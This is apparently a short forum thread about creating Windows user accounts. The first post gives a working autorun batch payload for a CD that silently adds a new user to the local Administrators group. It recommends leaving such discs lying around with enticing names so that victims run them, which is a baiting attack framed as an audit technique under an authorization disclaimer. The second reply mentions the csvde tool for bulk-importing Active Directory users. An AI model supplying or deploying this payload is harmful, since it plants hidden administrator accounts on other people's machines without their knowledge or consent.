-
Disclaimer: This info is to be used strictly for testing systems which you have written permission to do so, or that you own.
For testing purposes, you can burn a cd with some data and a batch file with the info below. Point your autorun.inf to the batch file.
echo= off
net user username password /add && net localgroup Administrators username /add
exit
There's a whole lot of things you could do in a batch script. This is useful when doing an audit, because chances are, if you don't have access to the target machine, leaving cd's like these around and giving them interesting names are likely to get them thrown into the cd-drive.
--PuRe
-
I remember there is a command-line tool named csvde. You can use it if you are using one of the windows 2000 server family platform just like 2000server on which the AD had been installed. The tool can help you creating lots of new users from a .csv file into AD database.